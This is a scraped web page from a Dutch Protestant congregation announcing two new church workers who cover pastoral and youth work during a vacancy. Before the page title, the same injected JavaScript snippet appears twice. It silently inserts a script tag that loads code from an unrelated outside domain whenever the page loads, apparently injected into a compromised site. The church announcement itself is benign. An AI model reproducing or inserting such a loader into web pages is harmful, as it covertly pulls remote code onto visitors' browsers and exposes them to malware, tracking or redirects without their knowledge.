;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Even voorstellen ... onze kerkelijke werkers - PKN Damwâld

Even voorstellen … onze kerkelijke werkers

Gepubliceerd op: woensdag 26 juli 2017

Geen predikant, we zijn vacant … hoe moet dat nu met het pastoraat? Hoe geven we invulling aan het clubwerk, de gespreksgroepen, de catechisatie, de wijkavonden ? Worden zieken of rouwdragenden nog wel bezocht? Krijgen jong en oud in de gemeente nog wel voldoende aandacht?

Goed nieuws ! Afgelopen maandag mochten we als Hervormd Akkerwoude c.a, naast Jan Ynze van der Wal, die het (ouderen-) pastoraat verzorgd, nog een kerkelijk werker welkom heten.
Het gaat om Wiebe Feddema, die als jeugd-/jongeren en opbouwwerker zal gaan werken binnen Hervormd Akkerwâld. Hiermee mogen we gedurende de vacaturetijd ons als gemeente gezegend weten met twee zeer ervaren en bevlogen kerkelijke werkers binnen onze gelederen.

Binnenkort zullen Jan Ynze van der Wal en Wiebe Feddema ‘officieel’ in een ochtenddienst aan de gemeente worden voorgesteld. U krijgt dan ook de gelegenheid om hen persoonlijk de hand te schudden en welkom te heten in onze gemeente. Wij wensen Wiebe en Jan Ynze veel succes en zegen toe in hun werk binnen onze gemeente en kijken uit naar een fijne samenwerking.